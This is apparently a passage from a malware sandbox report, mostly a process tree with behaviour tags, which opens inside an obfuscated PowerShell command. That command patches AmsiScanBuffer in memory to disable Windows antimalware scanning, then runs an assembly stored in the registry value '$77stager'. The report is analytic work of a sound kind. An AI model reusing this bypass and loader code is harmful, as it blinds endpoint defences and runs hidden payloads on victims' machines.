IntPtr).GetType(),[string]),$Null);$aAimDKIDCiENaekgzNL=RuIdwLFZdpne @([String])([IntPtr]);$HjoRkpFocncOZqvdSwRmVO=RuIdwLFZdpne @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$FUdCvLhuypo=$wrKoaJuctLjFo.GetMethod('Ge'+[Char](116)+''+[Char](77)+''+'o'+''+[Char](100)+''+'u'+'l'+[Char](101)+'H'+[Char](97)+''+[Char](110)+''+[Char](100)+''+'l'+''+'e'+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+'n'+[Char](101)+''+'l'+'32'+'.'+''+[Char](100)+'l'+[Char](108)+'')));$kISoJahlEZayRd=$YddLyJKHpNyhAu.Invoke($Null,@([Object]$FUdCvLhuypo,[Object]('Lo'+'a'+''+[Char](100)+''+'L'+'i'+[Char](98)+''+[Char](114)+''+'a'+''+[Char](114)+'y'+'A'+'')));$YFkSeGHziLwnHaMZL=$YddLyJKHpNyhAu.Invoke($Null,@([Object]$FUdCvLhuypo,[Object](''+'V'+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+'u'+''+'a'+'lP'+[Char](114)+''+[Char](111)+''+[Char](116)+''+'e'+''+[Char](99)+'t')));$hKSadWt=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($kISoJahlEZayRd,$aAimDKIDCiENaekgzNL).Invoke(''+[Char](97)+''+'m'+''+'s'+''+[Char](105)+'.'+[Char](100)+''+[Char](108)+''+[Char](108)+'');$uPCrjwIokZiHlzXfl=$YddLyJKHpNyhAu.Invoke($Null,@([Object]$hKSadWt,[Object]('A'+'m'+''+[Char](115)+'iS'+[Char](99)+''+'a'+''+'n'+''+[Char](66)+'uff'+[Char](101)+''+[Char](114)+'')));$DrKsXoMSIW=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($YFkSeGHziLwnHaMZL,$HjoRkpFocncOZqvdSwRmVO).Invoke($uPCrjwIokZiHlzXfl,[uint32]8,4,[ref]$DrKsXoMSIW);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$uPCrjwIokZiHlzXfl,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($YFkSeGHziLwnHaMZL,$HjoRkpFocncOZqvdSwRmVO).Invoke($uPCrjwIokZiHlzXfl,[uint32]8,0x20,[ref]$DrKsXoMSIW);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+'F'+'T'+'WA'+'R'+''+[Char](69)+'').GetValue(''+'$'+''+'7'+''+[Char](55)+''+[Char](115)+'t'+'a'+''+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Users\Admin\AppData\Roaming\$77-scchost.exeC:\Users\Admin\AppData\Roaming\$77-scchost.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\$77-scchost.exeC:\Users\Admin\AppData\Roaming\$77-scchost.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\$77-scchost.exeC:\Users\Admin\AppData\Roaming\$77-scchost.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\$77-scchost.exeC:\Users\Admin\AppData\Roaming\$77-scchost.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\$77-scchost.exeC:\Users\Admin\AppData\Roaming\$77-scchost.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\$77-scchost.exeC:\Users\Admin\AppData\Roaming\$77-scchost.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\$77-scchost.exeC:\Users\Admin\AppData\Roaming\$77-scchost.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\$77-scchost.exeC:\Users\Admin\AppData\Roaming\$77-scchost.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\$77-scchost.exeC:\Users\Admin\AppData\Roaming\$77-scchost.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\$77-scchost.exeC:\Users\Admin\AppData\Roaming\$77-scchost.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\$77-scchost.exeC:\Users\Admin\AppData\Roaming\$77-scchost.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\$77-scchost.exeC:\Users\Admin\AppData\Roaming\$77-scchost.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\$77-scchost.exeC:\Users\Admin\AppData\Roaming\$77-scchost.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\$77-scchost.exeC:\Users\Admin\AppData\Roaming\$77-scchost.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\$77-scchost.exeC:\Users\Admin\AppData\Roaming\$77-scchost.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\$77-scchost.exeC:\Users\Admin\AppData\Roaming\$77-scchost.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\$77-scchost.exeC:\Users\Admin\AppData\Roaming\$77-scchost.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\$77-scchost.exeC:\Users\Admin\AppData\Roaming\$77-scchost.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\$77-scchost.exeC:\Users\Admin\AppData\Roaming\$77-scchost.exe2⤵
- Executes dropped EXE
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵
-
C:\Windows\system32\sihost.exesihost.exe2⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netprofm -p -s netprofm1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵
- Drops file in System32 directory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- NTFS ADS
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\ogg.dll,#12⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\ogg.dll,#13⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2780 -s 4484⤵
- Program crash
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"2⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffb10ceab58,0x7ffb10ceab68,0x7ffb10ceab783⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1600 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:23⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2100 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2212 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3080 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3156 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4132 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4444 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4468 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4252 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4788 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4812 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=4688 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=4908 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5000 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=5112 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=3380 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --mojo-platform-channel-handle=3468 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=4248 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --mojo-platform-channel-handle=5320 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --mojo-platform-channel-handle=5460 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --mojo-platform-channel-handle=5676 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --mojo-platform-channel-handle=5976 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6084 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6376 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6552 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --mojo-platform-channel-handle=6712 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --mojo-platform-channel-handle=5840 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --mojo-platform-channel-handle=6992 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --mojo-platform-channel-handle=6404 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --mojo-platform-channel-handle=7120 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --mojo-platform-channel-handle=7104 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --mojo-platform-channel-handle=7380 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --mojo-platform-channel-handle=7220 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --mojo-platform-channel-handle=7720 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --mojo-platform-channel-handle=6876 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --mojo-platform-channel-handle=7988 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --mojo-platform-channel-handle=8136 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --mojo-platform-channel-handle=8320 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --mojo-platform-channel-handle=8496 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --mojo-platform-channel-handle=8632 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --mojo-platform-channel-handle=8680 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --mojo-platform-channel-handle=8976 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --mojo-platform-channel-handle=8480 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --mojo-platform-channel-handle=9400 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --mojo-platform-channel-handle=9456 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --mojo-platform-channel-handle=8656 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --mojo-platform-channel-handle=9688 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --mojo-platform-channel-handle=9612 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --mojo-platform-channel-handle=10004 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --mojo-platform-channel-handle=10128 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --mojo-platform-channel-handle=6116 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --mojo-platform-channel-handle=10064 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --mojo-platform-channel-handle=6100 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:13⤵
-
